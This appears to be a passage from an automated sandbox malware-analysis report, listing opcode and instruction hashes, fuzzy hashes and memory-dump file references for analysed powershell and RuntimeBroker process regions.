                                                                                                                                      • Opcode Fuzzy Hash: a67941b112c9d8a6a0c7bada7299a4b15c93517f6fcda5a20f751049ebdf6e08
                                                                                                                                      • Instruction Fuzzy Hash: D7F0EC70E0550E8BEB14DF84C4647FC77B1AB5C319F15413AC015A62E4CB79A988CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction ID: d8cdbc9fa8ab1dd57462dd35c568cd550ea0f0b09558d317de7ffdb5c814b746
                                                                                                                                      • Opcode Fuzzy Hash: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction Fuzzy Hash: 1EE0923195E38D8FDB269F7088665D93FA0FF45304F0606BAD458461E6EA68AA24C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
                                                                                                                                      • Instruction ID: f549b9050bd2d094f6d424cfcc68510edbfe49707a53a5e7696cd76faf6c8ab8
                                                                                                                                      • Opcode Fuzzy Hash: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
                                                                                                                                      • Instruction Fuzzy Hash: 4AF0303275CA088FDB5CAA1CF8529B573D1EB99330B10016EE48BC3696E927E8428685
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                                                      • Instruction ID: fe4b42ce1718875437b32093cd74c164c03aefd7c0e109ff27d8a41de0f6f770
                                                                                                                                      • Opcode Fuzzy Hash: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                                                      • Instruction Fuzzy Hash: 09F0B431808A8D4FDB56EF6888695D5BFA0EF16311B0502DBE458C70B2DB759558CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000017.00000002.3307394148.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_23_2_7ffd9b880000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                      • API String ID: 0-2528851458
                                                                                                                                      • Opcode ID: c246f5b10b1fb4dfbbc3f7246b433dbdd6090e5cff2b7d3f33dd8a073cea2d4a
                                                                                                                                      • Instruction ID: d4ea238b183a4c5fe4524344354017a572c74594501292c34f71046ec32452b4
                                                                                                                                      • Opcode Fuzzy Hash: c246f5b10b1fb4dfbbc3f7246b433dbdd6090e5cff2b7d3f33dd8a073cea2d4a
                                                                                                                                      • Instruction Fuzzy Hash: C4314F93E0FAD61BE763477958750942FA0EE5B66470E02E7C0E94F0A3FA1469478342
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wYC
                                                                                                                                      • API String ID: 0-1816533500
                                                                                                                                      • Opcode ID: 34903005e38445be1c3caca7286aa3338e99f51e4f9e71a204e3048d3715c2f7
                                                                                                                                      • Instruction ID: afe0accac22646efe4ca6818580b6790547a0f3110cd51d43df0aa499a7f1deb
                                                                                                                                      • Opcode Fuzzy Hash: 34903005e38445be1c3caca7286aa3338e99f51e4f9e71a204e3048d3715c2f7
                                                                                                                                      • Instruction Fuzzy Hash: 0C513A71A0DB889FDB199F5C9C1A6A87FE0FF55310F4441AFE09983293DE20A955CBC2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4cf06d134e2fe43205c4452748289c32250545fe760480720480c3e2b7ce52cb
                                                                                                                                      • Instruction ID: 04f11eb7c8b594ce30fe933000579b1f82376ce2d19706121f7b52a5f125ba93
                                                                                                                                      • Opcode Fuzzy Hash: 4cf06d134e2fe43205c4452748289c32250545fe760480720480c3e2b7ce52cb
                                                                                                                                      • Instruction Fuzzy Hash: AA11916260E7CA8FDB178B6498745A53FB0AF17240B0A01E7D489CB0B3D618A94CC792
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3296879909.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 66ea38963ab7c5d1f15c78f5fd381abf99a5e5887f5a979c5872ca10f02852ef
                                                                                                                                      • Instruction ID: 3b3fa05bd03b3490c2885537e05eabec27d7bd638240bf1ca9dde5941f2bac11
                                                                                                                                      • Opcode Fuzzy Hash: 66ea38963ab7c5d1f15c78f5fd381abf99a5e5887f5a979c5872ca10f02852ef
                                                                                                                                      • Instruction Fuzzy Hash: C741277140EBC84FE7568B3898559523FF0EF53320B1A06DFD088CB1B3D665A846C792
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 83bad9add4b0d116aa346ab125164a64a813529653bf6c75d3bc39e29e0756d4
                                                                                                                                      • Instruction ID: 910f361a8f97dce0a81a3bd72a369cc2fc5ffe49fbf78b4a08458b96b4aff024
                                                                                                                                      • Opcode Fuzzy Hash: 83bad9add4b0d116aa346ab125164a64a813529653bf6c75d3bc39e29e0756d4
                                                                                                                                      • Instruction Fuzzy Hash: 3A21073190CB4C8FDB59DFAC984A7E97FF0EB96321F04426BD048C3166DA74941ACB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                                                      • Instruction ID: 4f17bb1a1fc7e19c9ad0d3c861df80490d520998a0ea6bc7f24a8f51d51e1657
                                                                                                                                      • Opcode Fuzzy Hash: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                                                      • Instruction Fuzzy Hash: 80F02431808A8D4FEB1AEF2888694D57FA0EF16310B0502DBE448C71B2DB64A598CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                                                      • API String ID: 0-2452815496
                                                                                                                                      • Opcode ID: cfad986d6aabcb7dd436b3462ef7da774bd4c8b2c4bb5935930058db6551cc58
                                                                                                                                      • Instruction ID: e0677b4e17e5ca9dae0cae7b29736785f0da2bd671b4fc4c967bed99787c2262
                                                                                                                                      • Opcode Fuzzy Hash: cfad986d6aabcb7dd436b3462ef7da774bd4c8b2c4bb5935930058db6551cc58
                                                                                                                                      • Instruction Fuzzy Hash: 0B910353A0FADB5BEB27477948790907FA0FF1679470A02F6C0E98B0A3FD05790B8241
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M_^?$M_^@$M_^K$M_^N$M_^T$M_^Y
                                                                                                                                      • API String ID: 0-2127400921
                                                                                                                                      • Opcode ID: 26adb80e0b1586490d5e7e6948edb19b823c3a2086bb3e742104ba0b10a01581
                                                                                                                                      • Instruction ID: 1209433c9f1ca100ef023c93cd4227821dd51abdec75253c69ea10c490b635f9
                                                                                                                                      • Opcode Fuzzy Hash: 26adb80e0b1586490d5e7e6948edb19b823c3a2086bb3e742104ba0b10a01581
                                                                                                                                      • Instruction Fuzzy Hash: 0821F2A370883A8AD70A36ADBC159E87780DFA523938503F3E169CB1D3FC14A48786C0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000001A.00000002.3244274607.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_26_2_7ffd9b980000_powershell.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%
